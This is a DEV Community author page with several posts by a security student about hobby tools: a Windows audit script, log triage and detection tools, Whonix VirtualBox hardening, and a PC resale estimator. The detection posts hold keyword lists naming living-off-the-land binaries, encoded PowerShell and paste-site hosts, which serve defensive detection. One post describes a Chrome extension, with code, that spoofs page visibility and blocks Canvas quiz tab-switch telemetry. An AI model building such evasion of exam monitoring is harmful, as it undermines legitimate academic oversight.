DEV Community: TiltedLunar123

My Windows audit tool flagged rundll32 as suspicious. It was right, and useless.

TiltedLunar123 — Mon, 01 Jun 2026 09:14:38 +0000

I built a thing called WinRecon. it's a python script that audits a windows box and hands you back a security score. 20 checks, runs on the standard library only, no pip, no internet. you point it at a machine and it tells you the firewall is off on the public profile, smbv1 is still enabled, rdp has network level auth turned off, defender is disabled, that kind of stuff. it writes one self-contained html report and a json file you can feed into a SIEM.

the check i spent the most time on reads scheduled tasks and startup entries and tries to spot an attacker living off the land. encoded powershell, certutil pulling down a file, regsvr32 running a remote scriptlet, bitsadmin, msiexec, the usual lolbin crowd. the idea was simple. attackers reuse the same handful of signed binaries, so just scan the command lines for those keywords.

first time i ran it on my own laptop it threw four criticals. every one of them was rundll32 or certutil. none of them were malware.

the keyword scanner was technically correct

here's roughly what the first version did. i had a flat list of bad strings and i checked if any of them showed up in the task's command line.

SUSPICIOUS = [
    "-enc", "-encodedcommand", "frombase64string", "bypass",
    "certutil", "bitsadmin", "regsvr32", "rundll32", "msiexec",
    "invoke-expression", "downloadstring", "ngrok.io",
    "raw.githubusercontent", "pastebin.com",
]

def scan_command(cmd):
    hits = [s for s in SUSPICIOUS if s in cmd.lower()]
    if hits:
        return Finding("CRITICAL", f"suspicious task: {hits}")
    return None

the problem is that windows ships with a pile of scheduled tasks that legitimately call rundll32. there's one that runs rundll32.exe advpack.dll,DelNodeRunDLL32. there's printer stuff, there's a microsoft compatibility appraiser task. certutil shows up in cert maintenance. so the scanner was right that the binary was there. it just had no idea whether the binary was doing something bad.

that's the actual hard part of lolbin detection and i'd basically skipped it. presence of certutil isn't the signal. certutil reaching out to a url is the signal. rundll32 loading a dll out of %temp% is the signal. rundll32 firing off a signed microsoft task is just tuesday.

what i changed

i stopped treating the keyword list as one bucket. i split it by how much the match actually tells you.

a bare lolbin name on its own is weak. it only gets interesting when it's paired with something else. so a hit became critical only if the binary keyword showed up with a second-stage indicator, like a url, a base64 blob, -windowstyle hidden, or a path that points at a temp or appdata directory. a lolbin by itself with none of that drops down to INFO, which in the report means "here, look at this, but i'm not going to scare you about it."

STAGE2 = ["http://", "https://", "-enc", "frombase64string",
          "-windowstyle hidden", "%temp%", "%appdata%", "downloadstring"]

def scan_command(cmd):
    c = cmd.lower()
    lol = [s for s in LOLBINS if s in c]
    if not lol:
        return None
    stage2 = [s for s in STAGE2 if s in c]
    if stage2:
        return Finding("CRITICAL", f"{lol} with {stage2}")
    return Finding("INFO", f"{lol} present, no second-stage indicators")

after that, my laptop went from four criticals to zero, with a handful of INFO notes for the microsoft tasks i now know are fine. and the one time i tested it against a fake task that ran powershell -enc <base64> out of appdata, it lit up critical like it should.

it's still keyword matching. i want to be honest about that. it doesn't parse the command line into a real argument tree, it doesn't follow what the dll actually does, and a half-clever attacker who renames their payload path or splits the command can walk right past it. it's a tripwire, not a verdict. for a tier 1 "is anything obviously wrong on this box" pass that's about the right altitude, but i wouldn't call it detection.

the part i'm actually happy with

the constraint that shaped the whole project was no dependencies. it had to run on a locked-down windows machine with no pip and no outbound internet, because that's the machine you actually want to audit. so everything is subprocess against built-in windows commands and stdlib parsing. netsh advfirewall for the firewall, net user and net localgroup for accounts, the registry for the powershell logging and uac settings.

that sounds annoying and it sort of was, but it means you can drop a single .py file on a fresh box and run it. no install step, nothing to flag, nothing to phone home. the report is one html file with the css inlined so it opens with no network either.

scoring is deliberately dumb. you start at 100, every critical costs 20, every warning costs 10, and you land on an A through F grade. i went back and forth on weighting findings more cleverly and decided against it. a crude score that a hiring manager or a non-security person can read in two seconds beats a precise one nobody trusts. exit code is 2 if anything critical fired, so you can wire it into a pipeline.

what's next / what's broken

the lolbin scanner still can't tell a renamed binary or a split command from a clean one. real argument parsing is the obvious next step.
no native event log correlation yet. it checks that the event log service is healthy but doesn't read the logs.
the roadmap has compliance mapping (CIS, NIST), but i didn't want to claim a mapping i hadn't actually verified against the benchmark text, so it's not in there yet.

repo's here if you want to poke at it or tell me where the detection logic is naive: https://github.com/TiltedLunar123/WinRecon

it's MIT, and it's for boxes you're allowed to audit. it works. not perfect, but it works.

I let the AI write the report, not decide the alerts

TiltedLunar123 — Sun, 31 May 2026 10:45:18 +0000

I've been building a SOC triage tool called TriageLens, and the whole thing started from one annoyance. Every "AI security analyst" demo I tried was just a chatbot with a log pasted into the prompt. Ask it twice, get two different verdicts. For triage that's useless. If the tool says "brute force, critical" one run and "looks fine" the next, I can't trust either answer.

So I drew a hard line early. The AI doesn't get to decide what's a finding. It only gets to write the finding up.

the split

Parsing, detection, and risk scoring are plain TypeScript. No model involved. The pipeline normalizes Windows Security 4688, Sysmon Event 1, Linux SSH auth.log, and generic JSON into one event shape, runs a list of detection rules over those events, and scores the result 0-100. All deterministic. Same logs in, same findings out, every time.

The AI layer sits at the very end. It takes the structured findings that already exist and turns them into analyst-style prose: a summary, per-finding notes, prioritized next steps. If I swap the provider from the built-in demo one to Ollama to Claude, the findings and the MITRE mapping don't move at all. Only the wording changes.

That property is the part I actually care about. The detections are auditable. The model is just the writer.

a rule is just a function

Each detection rule is a pure function that looks at the events and returns evidence strings. Empty array means it didn't fire. Here's the one I'm happiest with, the chained one:

{
  id: 'successful-auth-after-brute-force',
  title: 'Successful login after brute-force activity',
  severity: 'critical',
  techniques: techniques('T1110', 'T1078'),
  detect: (events) => {
    const failsByIp = countFailuresByIp(events)
    const evidence: string[] = []
    for (const e of events) {
      if (
        e.eventId === 'auth-success' &&
        e.sourceIp &&
        (failsByIp[e.sourceIp] ?? 0) >= 5
      ) {
        evidence.push(
          `Successful login for "${e.user}" from ${e.sourceIp} after ${failsByIp[e.sourceIp]} failures`,
        )
      }
    }
    return evidence
  },
}

On its own, a pile of failed SSH logons is just noise. Lots of hosts get sprayed all day. What changes the picture is a success from the same IP that just failed a bunch. The brute-force rule alone is high. The success-after-brute-force rule is critical, mapped to T1110 and T1078, because at that point you're probably looking at a real compromise, not background scanning.

Writing it as a plain function means I can unit test it with a handful of fake events and know it fires on exactly the case I want. No prompt tuning, no "please respond in JSON." countFailuresByIp is about six lines and counts auth-failure events per source IP. The whole rule file reads top to bottom like a checklist.

what I tried first and dropped

My first version actually did hand the raw logs to the model and ask it to return findings as JSON. It worked in the demo and fell apart the moment I fed it anything weird. Sometimes it invented an event ID that wasn't in the log. Once it confidently flagged a normal svchost as a LOLBin. And the JSON would occasionally come back with a trailing comment or markdown fence that broke the parser.

I spent a day trying to prompt my way out of that and then gave up on the approach entirely. Moving detection into code wasn't a performance decision, it was a "I need to be able to trust this" decision. The model is great at writing the summary. It's bad at being the source of truth.

what's still rough

The honest part. It only reads EVTX if you've already exported it to JSON. There's no native .evtx binary parser yet, which is the next thing on the roadmap, and right now that export step is an annoying manual hop. The rule set is small, seven rules, so it catches the obvious stuff (encoded PowerShell, Office spawning a child process, log clearing, the SSH chain) and misses plenty. I want Sigma import so I'm not the only one writing detections in my own format.

It also isn't a SIEM and I'm not pretending it is. It's a learning project and a triage aid. It does not replace tuned detection content or a human deciding what matters.

It runs with zero setup though. npm install, npm run dev, a sample log is already loaded, click Analyze. The default provider needs no API key, so you can see the whole loop without signing up for anything.

Repo's here if you want to poke at it or tell me which rule is wrong: https://github.com/TiltedLunar123/triagelens

Built with React, TypeScript, Vite, and vitest for the rule tests. Happy to take detection ideas, that's the part I most want to grow.

The VirtualBox settings I had to turn off before shipping a Whonix installer

TiltedLunar123 — Fri, 29 May 2026 09:32:24 +0000

Whonix is a pair of linux VMs that route all your traffic through Tor. One VM (gateway) does tor. The other (workstation) has no direct internet at all, only a private adapter that connects to the gateway. If something in the workstation gets compromised, it still can't see your real IP, because it doesn't have a path to it.

That gateway/workstation isolation is the whole pitch and it works. The part people don't talk about as much is that the workstation VM itself has a bunch of communication channels back to the host machine, and those channels are not protected by the tor isolation at all. They're configured in VirtualBox, and VirtualBox defaults assume you want a usable desktop, not an isolated one.

I built a powershell installer for Whonix on windows. The first version downloaded the OVA, imported it, started the gateway, started the workstation. Done. I opened the workstation settings in the VirtualBox GUI to take a screenshot for the README, and saw this:

Audio: enabled, PulseAudio driver
Shared clipboard: bidirectional
Drag and drop: bidirectional
USB controller: enabled (USB 2.0 OHCI/EHCI)
3D acceleration: enabled
Remote display: enabled on port 3389

For a privacy VM, every one of those is a problem.

Clipboard and drag-and-drop

Bidirectional clipboard means anything copied on the host shows up in the workstation, and anything copied in the workstation shows up on the host. If you're using Whonix to do something you don't want associated with your real identity, and you have a password manager on the host that auto-pulls clipboard, you've crossed the boundary in two directions.

Drag-and-drop is the same thing for files. Either disable both or set them to one direction. I default to off:

VBoxManage modifyvm "Whonix-Workstation-Xfce" --clipboard-mode disabled
VBoxManage modifyvm "Whonix-Workstation-Xfce" --draganddrop disabled

Audio

PulseAudio in a privacy VM is just noise (literal and figurative). The audio device gets a name from the host config, which can be a fingerprintable string. Even ignoring fingerprinting, you almost never want sound out of a tor-routed VM.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --audio-driver none

USB controller

USB passthrough lets the guest see USB devices on the host. Plug in a YubiKey, the guest can read serial number, vendor ID, product ID. Same with USB drives, webcams, phones. None of that should be reachable from a workstation that's supposed to be isolated.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --usb-ohci off --usb-ehci off --usb-xhci off

3D acceleration

3D accel routes guest graphics calls through the host GPU driver. The history of VM escapes through 3D drivers is long enough that it's the first thing to turn off on any VM you actually care about. For a workstation running tor browser and a text editor, you don't need it.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --accelerate3d off

Remote display

Default-on RDP inside a VM that's supposed to be isolated. Bound to localhost by default, but it's still a service running that the workstation has no reason to expose.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --vrde off

What I had to learn the hard way

Two things tripped me up writing this.

First, you can't apply most of these settings while the VM is running. VBoxManage gives you a polite error and exits. The installer order matters: import the OVA, configure with VM stopped, then start. I had import-then-start before I added the configure step, and the script ran without errors but quietly never applied any hardening.

Second, VirtualBox has both --clipboard-mode (newer) and --clipboard (older). Depending on which version is installed, one of them throws an unknown option error. I pin VirtualBox to a known version in the installer to dodge this, but it bit me on a friend's machine that had an old 6.x version laying around from a previous install.

The installer also does SHA-512 verification of the OVA, and there's an optional flag to pin the VirtualBox installer hash. Different post. If you trust the OS image but not the hypervisor binary, your supply chain story has a hole in it.

What still bugs me

The big one: clipboard fully off is annoying. If someone uses Whonix as a daily-driver browsing VM, they want to copy URLs in and out. The right call is probably host-to-guest only (you can paste in, the workstation can't push back to the host). I haven't shipped that change because picking a default direction the user can't easily fight is its own design problem, and I haven't decided which direction wins.

Repo: https://github.com/TiltedLunar123/WhonixAutoSetup

How Canvas LMS tracks tab-switches during quizzes, and a chrome extension to stop it

TiltedLunar123 — Thu, 28 May 2026 09:54:39 +0000

a friend told me her professor pulled her aside after a quiz because the LMS flagged her for "tab switching 7 times". she wasn't cheating. she alt-tabbed to check the time on her clock app, then back. seven times over a 50-minute quiz.

i went looking for what canvas actually sends back when you blur the window. turns out it's pretty noisy.

what canvas tracks

open devtools on a quiz page, switch tabs, switch back. you'll see POSTs to something like /api/v1/courses/X/quizzes/Y/submissions/Z/events with payloads like:

{
  "event_type": "page_blurred",
  "event_data": { "timestamp": 1716902400000 }
}

then page_focused when you come back. it also pings on visibilitychange for good measure, and there's a separate page-view heartbeat that ticks every few seconds.

the events get attached to your submission. teachers see them in speedgrader as a little timeline. some schools have explicit policies that more than N tab-switches is grounds for "additional scrutiny".

first attempt: just block the endpoint

my first idea was a one-line declarativeNetRequest rule blocking */quiz_submission_events*. easy. doesn't work.

why? canvas uses navigator.sendBeacon() for some of these. beacons queue at the browser level and behave a little differently than fetch when it comes to extension interception. some events were still leaking through. there are also a couple of analytics endpoints that the same event posts to as redundancy, so blocking the obvious URL misses a few.

the actual approach

two layers.

layer 1: declarativeNetRequest. static rules in rules.json that block five known endpoints. cheap, fast. browser handles it before any js runs.

layer 2: a main-world inject script. patches addEventListener so anything registering for blur/focus/visibilitychange on quiz pages just gets a no-op. patches sendBeacon to return true without sending. patches fetch and XMLHttpRequest to filter the same URL patterns. also overrides document.visibilityState and document.hidden so even if a listener slips through, it always reads "visible".

manifest v3 makes you jump through hoops here. content scripts run in an isolated world by default and can't patch page globals. you need world: "MAIN" in the content_scripts entry, which is a relatively recent MV3 addition. without it none of the prototype patching works.

// snippet from inject.js
const origAdd = EventTarget.prototype.addEventListener;
EventTarget.prototype.addEventListener = function(type, listener, opts) {
  if (BLOCKED_EVENTS.has(type) && isQuizPage()) {
    return;
  }
  return origAdd.call(this, type, listener, opts);
};

dumb but it works. canvas's quiz js binds blur/focus exactly once on load, so if you patch addEventListener before their script runs, those listeners never get registered.

tier system

i ended up with three settings because heavy mode broke a few classes that legitimately use page-view tracking for participation grades.

lite: blocks the quiz_events endpoint and drops blur/focus listeners. minimal footprint.
mod: adds beacon/heartbeat blocking and stubs sendBeacon.
heavy (default): everything above plus visibility spoofing and full fetch/XHR interception.

per-domain allowlist. doesn't activate unless you've explicitly added the school's canvas instance.

what it can't do

proctoring software (respondus lockdown, proctorio, honorlock) is outside the browser sandbox. they hook the OS-level focus events through native code. nothing a chrome extension can touch.

server-side page views are also unblockable. canvas logs an HTTP request every time it serves a page. if you load the quiz, that's logged. you can stop the blur tracking but not "they opened the quiz at 3:47pm".

what i'm not happy with yet

the inject script timing is fragile. on slow networks the canvas quiz js sometimes runs before my patches apply, and then a blur event leaks through. i've seen it twice in 50-ish tests. moving the prototype patching to a run_at: document_start content script in a separate file would close that gap. on the todo list.

DNR's five-rule cap on static rulesets is also annoying. dynamic rules would let me add more endpoints based on what i see in network logs, but then i need storage permission and the security review for store distribution gets harder. for now i'm shipping unpacked from github.

privacy note

doesn't send anything anywhere. no analytics, no crash reports, no remote config. the only network requests it makes are the ones it's blocking.

repo: https://github.com/TiltedLunar123/canvas-blinders

if you want to see what canvas actually tracks before installing anything, open devtools on a quiz, switch tabs a few times, and watch the network panel. it's all there in cleartext.

My log triage tool is slower than Chainsaw, and I shipped it anyway

TiltedLunar123 — Wed, 27 May 2026 09:13:04 +0000

i build security tools as a cybersec student, mostly so i actually understand the stuff i'm studying instead of just memorizing it for Security+. ThreatLens started because i got tired of scrolling raw windows event logs looking for the one line that mattered.

the idea is simple. point it at a folder of logs, it runs detections, it tells you what looks like an attack. offline, no server, no agent. just a CLI.

the problem

if you've ever opened a security.json export with 900k events in it you know the feeling. somewhere in there is a brute force, or a service getting installed it shouldn't, or someone dumping creds. but you're not finding it by eye. you need something to do the first pass so you can spend your time investigating instead of reading.

i wanted that first pass to be local. a lot of the triage stuff assumes you've already shipped everything to a SIEM. i don't always have one running on my own boxes, and i wanted something i could just pip install and run.

what i tried

first version just regex'd through lines and counted failed logins. that catches the dumbest brute force and nothing else. real attacks are multi step. someone gets in with valid creds (T1078), runs something (T1059), sets up persistence (T1543), then moves sideways. a single rule never sees the whole picture.

so the detections became modules, 12 of them, each mapped to a MITRE technique. that part was fine. the part that took longer was correlation. a failed-login spike on its own is noise. a failed-login spike followed by a success followed by a new service on the same host is a story. linking those across detection boundaries is where most of the actual work went.

one design choice i'm happy with: separating targeted brute force from credential spray. they look similar if you just count failures. but a brute force hammers one account in a burst, and a spray tries one password across many accounts slowly. burst analysis on the timing tells them apart, and they're different investigations, so calling them the same thing would be lying to the analyst.

what worked

YAML rules with a handful of operators (equals, contains, regex, threshold) cover most of what i wanted to write without touching python. and it reads Sigma rules directly, which mattered because i didn't want to reinvent a rule format the whole industry already uses. selections, filters, field modifiers, conditions. not the full sigma-rs engine, but enough.

output goes to terminal, json, csv, or an html report with severity charts and an attack timeline. it can also push to elastic, splunk HEC, wazuh, or spit out an ATT&CK Navigator layer so you can see coverage on the matrix.

the numbers

synthetic benchmark, single core, python 3.11 on windows 11:

9,009 events (2.3 MB): 0.13s, about 69k events/sec
90,145 events (22.6 MB): 1.27s
901,341 events (226 MB): 14.24s, about 63k events/sec

on the sample dataset it hit every embedded technique and threw zero false positives on the benign activity. small sample, so i'm not going to pretend that's a real detection-rate claim, but it's a start.

what's broken / what i'd change

here's the honest part. at 63k events/sec it's slower than Chainsaw and Hayabusa, which are compiled. for a single-core python tool reading EVTX i think that's fine, but if you've got hundreds of millions of events you'd want one of those instead. i'm not pretending to compete on raw speed.

the parser also wants event IDs and syslog fields mapped to formats it knows. throw it something weird and it'll shrug. that's the next thing i want to fix, a more forgiving field mapper so onboarding a new log source doesn't mean editing code.

and the false-positive testing needs real ugly data, not synthetic. synthetic logs are too clean. real environments are full of weird-but-benign stuff that trips naive rules, and i won't trust the detection numbers until i've run it against messier input.

it's defensive only. no remote access, no capture, no exploit anything. just reads logs you already have on systems you're allowed to look at.

it works. not perfect, but it works, and i learned more about how attacks actually chain together building this than i did from any single chapter of studying.

repo: https://github.com/TiltedLunar123/ThreatLens

if you do detection engineering for real, i'd genuinely like to know what log source you'd want supported first.

shipping an offline log triage cli, and the parser bugs that still haunt me

TiltedLunar123 — Tue, 19 May 2026 11:10:45 +0000

a few weeks back i had a 226MB JSON log dump from a lab exercise and absolutely no desire to stand up a full SIEM just to find brute force attempts and lateral movement traces. i tried grep, gave up, tried jq, gave up harder, then ended up writing a python script that snowballed into ThreatLens.

it's a CLI that does offline triage on security logs. 12 detection modules, sigma rule compat, MITRE ATT&CK mapping, no daemon, no docker, no infra. you point it at a folder, it gives you a report.

threatlens scan logs/ --sigma-rules sigma/rules/ --min-severity high -o report.html

that's it. one command, html report on the other side.

what i actually had to solve

the first thing that bit me was EVTX parsing. windows event log binary format is annoyingly underdocumented in places, and the python-evtx library is solid but slow if you use it naive. i was getting around 8k events/sec on a 22MB file which was unusable.

i ended up streaming records instead of loading them, plus deferring the XML-to-dict conversion until a record actually matched a candidate detector. that pulled the throughput up. on synthetic benchmarks (single-core python 3.11):

9k events / 2.3 MB: 0.13s, 69.3k events/sec
90k events / 22.6 MB: 1.27s, 71.0k events/sec
900k events / 226 MB: 14.24s, 63.3k events/sec

it scales pretty flat, which i didn't expect. i thought GC churn or memory pressure would tank the big runs. it didn't.

the detector design

there are 12 built-in detection modules and they all implement the same interface. you can write custom ones in python or YAML.

YAML rule example:

name: suspicious_powershell_encoded
event_id: 4104
match:
  - field: script_block
    op: regex
    value: '(?i)([A-Za-z0-9+/]{50,}={0,2})'
  - field: user
    op: not_equals
    value: SYSTEM
severity: high
mitre: T1059.001

twelve operators total: equals, contains, regex, thresholds, time windows, and a few others. sigma rules also work. i implemented selection/filter/condition parsing and most field modifiers. not all of them. the sigma cidr modifier is half-broken in my impl and i know it. it's on the issue list.

multi-stage chain correlation

this is the part i'm actually proud of. instead of just firing alerts per-event, ThreatLens groups events that look like they're part of the same kill chain. brute force, then an interactive logon, then mimikatz-style SAM access. it links them across time windows.

on a 26-event focused simulation it found 1 CRITICAL, 8 HIGH, 2 MEDIUM, 1 LOW. on a 52-event mixed dataset (benign noise plus embedded attack) it hit zero false positives and 100% detection on the embedded TTPs.

i don't trust those numbers as a generalization. the corpus is small and i wrote both. but it's enough to say the correlation logic isn't just hallucinating, which is the bar i actually cared about.

configuration and CI use

there's a ~/.threatlens.yaml file for defaults so you don't have to repeat flags. CLI overrides config. you can also ship an allowlist.yaml that suppresses known-good alerts, which matters more than it sounds, because as soon as you point a tool like this at real logs you get drowned in legitimate-but-suspicious-looking activity (admin tooling, scheduled tasks, backup agents).

i ended up adding the allowlist mid-project because i was getting 200 alerts on my own dev box and almost none were real. now they live in YAML and i version-control them per environment.

there's also a --fail-on flag that returns exit code 2 if alerts above a threshold fire. dumb little thing, but it means you can wire ThreatLens into a CI step on a log corpus and have it actually break the build if a regression sneaks in.

what's broken

27 open issues. some of them are real.
sigma cidr modifier as mentioned
the streamlit dashboard exporter occasionally double-counts events when the input is NDJSON with trailing whitespace lines. i thought i fixed it. i didn't.
the follow subcommand (real-time tailing) leaks file handles if you ctrl-C during a log rotation event. found this one in the wild. embarrassing.
EVTX parsing on logs that have been touched by wevtutil epl sometimes desyncs. i think this is upstream but i haven't proved it.

outputs i ship

it can dump to JSON, CSV, HTML, interactive timelines (one html file with a vis-timeline embed), and push to Elasticsearch, Wazuh, Splunk HEC, ATT&CK Navigator layers, or STIX 2.1 bundles. the navigator output is the one i use most. you scan, you load the layer, and the heatmap of touched techniques is instantly readable.

what i'd do differently

honestly, i'd write the YAML rule loader first. i wrote the python plugin system first because it was more fun, then bolted YAML on later, and there are seams where the two abstractions don't quite agree. if i rewrote it i'd start at the rule format and make python plugins compile down to the same internal representation.

also i'd write tests earlier. test coverage is maybe 40%. the correlation logic has decent coverage because i kept breaking it. the output formatters basically have none.

repo

https://github.com/TiltedLunar123/ThreatLens

MIT licensed. PRs welcome, issues even more welcome. if you triage logs and have an EVTX file that breaks the parser, i would actually love to see it.

I wrote a PowerShell script to guess my PC's resale value (and learned my depreciation math was wrong)

TiltedLunar123 — Sat, 16 May 2026 09:19:45 +0000

Tried selling my old laptop last month. eBay sold listings were all over the place. Same model, same year, prices ranging from $180 to $420. Some had keyboards with missing keys, some were "great condition, no charger." Useless for getting a real number.

So I built a script. It pulls hardware info out of WMI, looks up parts in a local pricing database, and spits out an estimate. No admin needed. No internet required for the basic run.

Here's where I got it wrong the first time.

The naive version

My first depreciation model was straight linear. Drop 20% the first year, 15% the next, and so on. Simple. Wrong.

When I tested it against actual sold listings, the script came in 25-40% high on anything older than 2 years. Linear decay overstates value because hardware doesn't lose worth on a flat schedule. It loses worth fast in year one (you opened the box, congrats) then slower after that.

What I switched to

Multiplicative decay. Year 1 retains 70% of original. Year 2 multiplies that by 0.80. Year 3 by 0.85. Floor at 15% so you never get $0 for a working machine.

function Get-DepreciationMultiplier {
    param([int]$Years)

    if ($Years -le 0) { return 1.0 }

    $value = 0.70
    if ($Years -ge 2) { $value *= 0.80 }
    if ($Years -ge 3) { $value *= 0.85 }
    for ($i = 4; $i -le $Years; $i++) {
        $value *= 0.88
    }

    return [Math]::Max($value, 0.15)
}

A 3-year-old system lands at roughly 48% of its original component total. That tracked with what I was actually seeing on completed eBay sales.

Hardware detection

WMI does most of the work.

$cpu = Get-CimInstance Win32_Processor | Select-Object -First 1
$gpu = Get-CimInstance Win32_VideoController | Where-Object { $_.AdapterRAM -gt 0 }
$ram = (Get-CimInstance Win32_PhysicalMemory | Measure-Object Capacity -Sum).Sum / 1GB

Battery is its own thing on laptops. Get-WmiObject -Class BatteryStatus -Namespace root\WMI gives you charge state but not health. For health I parse the output of powercfg /batteryreport which writes an HTML file with design capacity and full charge capacity. Health percentage is the ratio.

That HTML parse is the ugliest part of the script. I used regex against the report because pulling in HtmlAgilityPack felt like overkill for two numbers. It works. If Microsoft changes the report format I'll find out the hard way.

The age problem

Figuring out how old the machine is turned out to be harder than I expected. WMI doesn't expose a clean "manufactured on" date. I tried three sources:

BIOS release date from Win32_BIOS.ReleaseDate. Sometimes accurate, sometimes the BIOS was updated and the date is post-manufacture.
OS install date. Useful only if the original owner never reinstalled.
SMBIOS table parsing. Most accurate. Most annoying to do from PowerShell.

I went with BIOS date as the primary, OS install date as a fallback if the BIOS date is missing or clearly bogus (in the future, before 1995, etc). It's wrong sometimes. Most users sell within a couple years of buying so the error doesn't compound much.

Pricing lookup

The offline pricing database is a JSON file with CPU/GPU model strings mapped to current estimated values. I scraped these once from a hardware pricing site, normalized the model names, and committed it. The script does fuzzy matching because WMI returns CPU strings like "Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz" and my database has "i7-10750H." Levenshtein distance under 5 counts as a match.

The eBay check is optional and slow. It hits the sold listings API, pulls the last 30 results for a query like "$cpu $gpu $ram", filters out wrecks (titles containing "broken," "parts," "no power"), and averages the middle 50% to drop outliers.

What's broken

Desktop GPU detection is messy when there's an integrated and a discrete card. I take the one with more VRAM but that's hacky.
No support for AMD APUs as a single unit. The script treats the CPU and GPU separately even though they're the same chip.
The pricing database goes stale fast. I update it manually every few months. Should probably write a scraper.
It assumes Windows. PowerShell Core would let it run on Linux but I haven't tested it.

What I'd do differently

If I were starting over I'd skip the JSON pricing database and hit the eBay API every time, with a 24-hour cache. Maintaining the offline DB is the worst part of this project and the eBay numbers are more accurate anyway. The "offline" feature sounded cool when I started. In practice I always run with -UseEbay enabled.

Code is on GitHub. PowerShell 5.1 ships with Windows so there's nothing to install.

https://github.com/TiltedLunar123/pc-worth

Setting up Whonix on Windows without clicking through 30 VirtualBox dialogs

TiltedLunar123 — Thu, 14 May 2026 09:13:32 +0000

Whonix gives you Tor isolation by routing one VM's traffic through another. Gateway VM handles Tor. Workstation VM does the actual work. If the Workstation gets compromised, your real IP doesn't leak because it can only talk to the Gateway.

Setting it up by hand is tedious. Download VirtualBox, download two OVA files, import them, configure network adapters, allocate RAM, disable USB and audio, boot Gateway, wait for Tor, then boot Workstation. Miss a step and your isolation is broken.

I wrote a PowerShell project that does the whole thing.

What it actually does

Four scripts run in order:

.\prereq-check.ps1
.\setup.ps1
.\configure-vms.ps1
.\start-whonix.ps1

prereq-check.ps1 validates RAM, CPU cores, disk space, and whether VT-x or AMD-V is enabled. It fails fast if your machine can't run two VMs.

setup.ps1 pulls the right VirtualBox version and the two Whonix OVAs (Gateway and Workstation), then verifies SHA-512 hashes before importing. If a download is tampered with mid-flight, the install stops there.

configure-vms.ps1 sets the security defaults. USB controllers off, audio off, 3D acceleration off, nested virtualization off. Clipboard isolation between host and guest. Gateway gets a fixed 1 CPU and 1 GB of RAM because Tor doesn't need more, and giving it more is wasted memory. Workstation gets 25 to 40 percent of available RAM depending on what the host can spare.

start-whonix.ps1 boots Gateway first, then waits.

The startup ordering thing

This is the part that took the longest to get right.

You can't just boot both VMs at once. The Workstation has its only network route through the Gateway. If the Workstation comes up before Tor finishes bootstrapping inside the Gateway, the Workstation has no DNS, no connectivity, nothing. Some apps will time out and stay broken until you restart them.

My first attempt was a hardcoded sleep. Wait 90 seconds after starting Gateway, then start Workstation. It worked on my fast machine. On a slower one it didn't. Sometimes Tor took 3 minutes to bootstrap.

The fix was to poll. After Gateway boots, the script opens a TCP connection to the Gateway's Tor SocksPort. If it connects, Tor is ready. If it refuses or hangs, keep waiting. There's a timeout at 5 minutes because if Tor hasn't bootstrapped by then something else is wrong.

The check is dumb but reliable:

$tcpClient = New-Object System.Net.Sockets.TcpClient
$connect = $tcpClient.BeginConnect($gatewayIP, 9050, $null, $null)
$wait = $connect.AsyncWaitHandle.WaitOne(2000, $false)
if ($wait -and $tcpClient.Connected) { return $true }

Wrapped in a retry loop with a small delay between attempts.

Version pinning

The other thing I wanted was reproducibility. If I deploy this on three machines, I want the exact same VirtualBox version and the exact same Whonix images on all of them.

Whonix releases change. So does VirtualBox. So the script takes pinned version parameters with their expected hashes:

.\setup.ps1 -WhonixVersion "18.1.4.2" -WhonixHash "sha512:abc..."

If you don't pass them, it uses a default set that's known to work. If you pass a version, you also pass the hash, and the script refuses to run if the download doesn't match. This is annoying when versions change because I have to update the defaults. But it means a stale clone of the repo won't silently pull a different image.

Security defaults

A lot of the configure step is just turning things off. USB passthrough off, because a compromised workstation shouldn't be able to read your USB drives. Audio off, same reason. 3D acceleration off, because the graphics passthrough has had escape bugs before. Nested virtualization off, because the Workstation shouldn't be spinning up its own VMs.

Clipboard sharing is set to host-to-guest only, not bidirectional. Drag and drop is disabled. Shared folders are not configured by default. If you want any of these you have to turn them on yourself, which is the point.

None of this is novel. The Whonix docs recommend most of these settings. The script just makes sure I don't forget one.

What's still broken

It only works on Windows. The PowerShell is everywhere but VBoxManage paths and registry checks are Windows-specific. Linux users have their own tooling for this already.

It doesn't handle the case where VirtualBox is already installed but with a mismatched version. Right now it just warns. I should add a flag to force-upgrade or skip.

And the prerequisites check is conservative. It refuses to run on machines with less than 8 GB of RAM, but Whonix technically runs on 4 GB if you're patient. Someone with a low-end machine asked me to add an override and I haven't yet.

Repo

github.com/TiltedLunar123/WhonixAutoSetup

The README has the full parameter list and a few troubleshooting notes for when the Tor bootstrap fails. If you run it and something breaks, the issue tracker is open.

I built a Windows optimizer that refuses to run if Outlook is open

TiltedLunar123 — Wed, 13 May 2026 09:23:30 +0000

I wrote a PowerShell script that hardens and tunes Windows 10/11. Pretty standard stuff. Disables telemetry, kills bloatware, tweaks the registry for performance, hardens a few obvious holes (SMBv1, AutoRun, Remote Desktop if you don't use it).

Writing those tweaks isn't hard. The hard part is what happens when you run a script like that on a machine someone is actually using.

My first version was clean. Smooth even. Then I ran it on my dad's laptop while he was on a Zoom call. The script disabled a couple of audio services it thought were unused. Mic cut out mid-meeting. He was not impressed.

That was the moment I added context-aware safety.

Now before the script touches anything, it scans for running processes and connected hardware that would care. Outlook running? Skip the network resets. RDP session active? Don't touch firewall rules. Touchscreen detected? Leave the tablet input services alone. Print job queued? Don't kill the spooler.

It's a stupid amount of edge-case logic for a script people will run once. But it's the difference between "optimizer" and "incident."

Here's roughly how the privacy module handles it:

function Invoke-PrivacyOptimization {
    param([switch]$DryRun)

    $context = Get-RuntimeContext
    if ($context.Skip -contains 'Cortana-active') {
        Write-Log "Cortana in use, skipping Cortana disable"
        return
    }

    $changes = @{
        'AllowTelemetry' = 0
        'AllowCortana'   = 0
        'AdvertisingId' = 0
    }

    foreach ($key in $changes.Keys) {
        Save-UndoEntry -Name $key
        if (-not $DryRun) {
            Set-RegistryValue -Name $key -Value $changes[$key]
        }
    }
}

The undo logic is what I'm most proud of. Every registry change writes the previous value to a JSON file in %LOCALAPPDATA%\UWSO\ with restricted ACLs (so a non-admin user on the box can't tamper with the rollback). If anything breaks, you run the script with -Undo and it restores every value from the most recent run.

